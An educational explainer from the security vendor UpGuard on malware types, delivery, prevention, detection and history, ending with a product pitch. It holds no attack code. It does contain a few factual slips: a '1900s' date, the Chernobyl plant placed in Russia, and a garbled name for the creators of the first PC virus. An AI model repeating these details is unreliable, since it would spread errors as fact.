Generally, software is considered malware based on the intent of its creator rather than its actual features. Malware seeks to invade, damage, or disable computer systems, networks, tablets and mobile devices often taking partial control over a device's operations or leaking sensitive data, personally identifiable information (PII) and biometrics to an unauthorized third-party.
Cybercriminals who created malware are focused on making money off you or your computing resources illicitly or for corporate espionage. Malware does not generally damage physical hardware or network equipment. It generally focuses on either stealing, encrypting, deleting, altering or hijacking core computing functions or spying on your activity.
How does malware work?
For example, malicious programs can be delivered to a computer with a USB drive or spread over the internet with drive-by downloads, which automatically install the program without the user's approval. USBs are particularly popular because they can reduce the chance antivirus software identifies the malware because it sits on external hardware rather than the computer's hard drive.
Social engineering attacks like phishing scams are another common delivery mechanism. All it takes is an infected email attachment disguised as a legitimate message.
Fraudulent websites and peer-to-peer file sharing services that pretend to be providing legitimate software is another way to spread malware. Pirated software programs can often install a form of malware too.
Android and Apple mobile devices can also be infected by text messages or by installing fraudulent apps.
More sophisticated malware attacks often feature the use of a command-and-control server that allows attackers to communicate with the infected machine, extract sensitive data and even add the device to a botnet.
Emerging malware strains use evasion and obfuscation techniques designed to fool users, cybersecurity professionals and anti-malware products like malwarebytes.
Evasions techniques can be simple proxies designed to avoid IP attribution or sophisticated polymorphic malware that changes its code, to avoid signature-based detection tools, or anti-sandbox techniques that allow malware to detect when it is being analyzed and pause execution or fileless malware that resides in the computer's RAM.
Any malware is a cybersecurity risk, whether its stealing sensitive information, credit card numbers, exposing keystrokes or mining cryptocurrency.
Can mobile devices get malware?
Mobile phones can be infected with malware that provides unauthorized access to the device's camera, microphone, GPS, apps and accelerometer. Malware infections come from downloading unofficial applications, clicking malicious links from emails or text messages, through Bluetooth and Wi-Fi-based attacks, or by exploiting vulnerabilities.
Android devices are more commonly infected than iOS devices because Android is a more open platform than iOS. Signs that an Android device is infected include unusual data usage, poor battery life and texts and emails being sent from the device without your knowledge. Similarly, if you receive a text from a colleague that seems suspicious, their device could be infected and trying to spread malware between devices.
Another reason iOS devices are rarely infected is because of the App Store's careful vetting of new and existing applications.
What's the difference between a virus and malware?
All computer viruses are malware but not all malware are viruses. Viruses are one type of malware. The terms are used interchangeably but from a technical point of view, they differ.
Malware is malicious code, whereas a computer virus is malicious code that is self-replicating and spreads across computers and networks.
What are the different types of malware?
Types of malware include:
- Computer viruses: Viruses are a type of malware that self-replicates by modifying other computer programs and inserting its own code. When replication succeeds, the affected computer is said to be infected.
- Computer worms: Computer worms are self-replicating malware programs whose primary purpose is to infect other computers by duplicating. Worms often spread by exploiting vulnerabilities or poor network security.
- Trojan horses: Trojan horses are malware that misleads users by pretending to be a legitimate program. The term comes from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of Troy.
- Rootkits: Rootkits are a collection of malware designed to give unauthorized access to a computer or its software, often masking its existence or the existence of other software. Rootkit installation can be automated or the attacker can install it with administrator access. Anti-malware software often struggles to detect rootkits because they reside in the kernel and removal may require hardware replacement or specialized equipment.
- Ransomware: Ransomware attacks deny access to a computer system or data until ransom is paid. Ransomware attacks cause downtime, data leaks, intellectual property theft and data breaches.
- Keyloggers: Keyloggers, keystroke loggers or system monitoring tools are a type of malware used to monitor and record each keystroke typed on a keyboard or mobile device. Keyloggers are often used to gain access to personal information or login credentials.
- Grayware: Grayware is unwanted programs or files that worsen the performance of a computer and create cyber risk.
- Fileless malware: Fileless malware uses legitimate programs to infect computers. Unlike other kinds of malware, fileless malware does not rely on files, making it challenging for malware protection software to detect and remove. It exists solely as a memory-based artifact. It leaves very little evidence that can be used for digital forensics.
- Adware: Adware is a type of grayware designed to put advertisements on your screen often in a web browser pop-up.
- Malvertising: Malvertising, a portmanteau of malicious advertising, is the use of advertising to spread malware. It typically involves injecting malicious advertisements into legitimate advertising networks or webpages.
- Spyware: Spyware gathers information about a person or organizations, without their knowledge, and sends the information to the attacker.
- Botnets: Botnets use infected devices and remotely control them in real-time to launch cyber attacks. Botnets are a popular method for launching distributed denial of service (DDoS) attacks.
- Backdoors: A backdoor is a covert method of bypassing normal authentication or encryption in a computer, product, embedded device (e.g. router) or other part of a computer. They are commonly used to secure remote access to a computer or gain access to encrypted files.
- Browser hijackers: Browser hijackers or hijackware changes the behavior of a web browser by sending the user to a new page, changing their home page, or installing unwanted software. This is a form of man-in-the-middle attack.
- Crimeware: Crimeware is a class of malware designed to automate cybercrime. It is designed to perpetrate identity theft, steal financial accounts to sell on the dark web or gather sensitive information.
- Malicious mobile apps: Not all apps available in the Google Play store or Apple App Store are legitimate. That said, the App Store is generally better at pre screening third-party apps. Android phones and android devices are often targets of malware threats because of their more open ecosystem.
- RAM scrapers: RAM scrapers harvest data temporarily stored in-memory or RAM. It often targets point-of-sale (POS) systems like cash registers that store unencrypted credit card numbers for a short period of time before passing them to the back-end.
- Rogue security software: Rogue security software tricks the user into thinking their system has a security problem and entices them to pay to remove it.
- Cryptojacking: Cryptojackers are a form of malware that uses a victim's computing power to mine cryptocurrency.
- Hybrid malware: Hybrid malware is malware that combines a variety of different malware attacks to make malware removal more difficult.
How to prevent malware infections
To prevent malware, it's important to use a defense in depth strategy that focuses on technical and non-technical solutions.
Phishing emails are one of the most common infection paths, so it's important to educate employees about phishing and to avoid downloading suspicious attachments or engaging with emails. Also look out for suspicious domains or typosquatting that masquerades as legitimate websites.
Don't download third-party apps on Android devices and avoid clicking pop-up ads.
There are other more technical preventative measures such as keeping your systems patched to avoid vulnerabilities, counteracting email spoofing, scanning for new vulnerabilities as they are listed on CVE, continuously monitoring your third-party and fourth-party vendors for malware infections, website security scanning and backing up your files to reduce the risk of ransomware.
One of the most famous malware attacks was the WannaCry ransomware computer worm which spread by exploiting the EternalBlue vulnerability in old versions of the Windows operating system. It remains a cyber risk, despite being patched because organizations still haven't updated their operating systems.
The lesson here is that while it can be time-consuming to keep software up-to-date, it's one of the easiest ways to reduce your cybersecurity risk. Beyond patching, third-party risk and fourth-party risk are an often underlooked part of preventing data breaches and malware infections.
It's not enough for your information security policy and information risk management strategy to only focus on your organization. Your cybersecurity risk assessment process needs to have a third-party risk management framework, vendor management policy and a vendor risk management program. Consider investing in a tool to automate vendor risk management.
How to detect malware
There are a few universal symptoms that may indicate the presence of malware on your device:
- Your device is running slower than usual: A sudden slowdown in computing power can indicate that malware has taken over your device's processing resources.
- You notice a shortage of available storage space: Many forms of malware install additional files on your device which will decrease the amount of storage available on your device.
- Pop-ups and unwanted programs appear on your device: This is one of the strongest signals that your device is infected.
- Your sensitive data has been exposed: Continuously monitoring for data exposures can help you understand when your data has been exposed by a malware infection.
How to remove malware
If you suspect a malware infection, consider installing an anti-malware program and running a scan. These programs are designed to search and remove any malware on your device.
Once your device is clean, it's a good idea to change your passwords and check your financial accounts for any suspicious transactions. Remember that an attacker doesn't necessarily have to use the information they gather right away. Also look for signs of a data breach or configuration changes in your cloud services products which may cause a data leak.
If you're lucky, you can find malware executables in active processes but fileless malware is making this more difficult.
The key thing to understand is once your sensitive data is exposed, it's hard to know where it has gone and the extent of the attack. This is why you need to invest in avoiding malware infections that lead to data breaches. The cost of a data breach has never been higher at an estimated average cost of $3.92 million.
And it's not just unsophisticated businesses who suffer from data breaches and malware infections, in fact some of the biggest data breaches ever were at technology companies.
What are some examples of malware?
- WannaCry: WannaCry is a ransomware cryptoworm cyber attack that targets computers running the Microsoft Windows operating system. It was initially released on 12 May 2017. The ransomware encrypted data and demanded ransom of $300 to $600, paid in the cryptocurrency Bitcoin.
- Stuxnet: Stuxnet is a malicious computer worm, first uncovered in 2010, thought to have been in development since at least 2005. Stuxnet targets SCADA systems and is believed to be responsible for causing substantial damage to Iran's nuclear program.
- Morris worm: The Morris worm or Internet worm of November 2, 1988, was one of the first computer worms distributed via the Internet, and the first to gain significant mainstream media attention. It also resulted in the first felony conviction in the US under the 1986 Computer Fraud and Abuse Act.
- CIH virus: Also known as the "Chernobyl virus", was named after the explosion of the nuclear plant in Russia because it was written to execute on the anniversary of the explosion. The virus worked by wiping data from the hard drives of infected devices and overwriting the BIOS chip within the computer, which rendered the device unusable.
- Petya: The malware targets Microsoft Windows–based systems, infecting the master boot record to execute a payload that encrypts a hard drive's file system table and prevents Windows from booting. It subsequently demands that the user make a payment in Bitcoin in order to regain access to the system.
What is the history of malware?
Before the Internet became popular, malware was spread on personal computers by executing programs on floppy disks. The malware, often a virus, would install itself on the computer and run itself whenever the computer was turned on.
Early viruses targeted Apple II and Macintosh but quickly spread to IBM PC and MS-DOS systems. Farooq Alvi brothers in Pakistan created the first IBM PC virus in 1986.
By 1988, the first well-known Internet worm was born, which infected SunOS and VAX BSD systems. Unlike a virus, this worm did not insert itself into other programs but exploited vulnerabilities in network servers and started running itself, not unlike modern day worms.
In the 1900s, there was a rise in Microsoft Office macro-based malware programs that spread by infected documents and templates. From 2002-07, there was a rise in instant messaging based worms that spread through AOL, AIM, MSN and Yahoo Messenger.
Adware based attacks proliferated in the mid to late 2000s as did social network based malware attacks.
Today, cryptojackers and ransomware are the most popular malware threats.
How UpGuard can prevent malware infections
There's no question that cybersecurity is more important than ever before.
That's why companies like Intercontinental Exchange, Taylor Fry, The New York Stock Exchange, IAG, First State Super, Akamai, Morningstar and NASA use UpGuard to protect their data, prevent data breaches, monitor for vulnerabilities and avoid malware.
UpGuard BreachSight can help combat typosquatting, prevent data breaches and data leaks, avoiding regulatory fines and protecting your customer's trust through cyber security ratings and continuous exposure detection.
UpGuard Vendor Risk can minimize the amount of time your organization spends managing third-party relationships by automating vendor questionnaires and continuously monitoring your vendors' security posture over time while benchmarking them against their industry.
Each day, our platform scores your vendors with a Cyber Security Rating out of 950. We can even alert you if their score drops.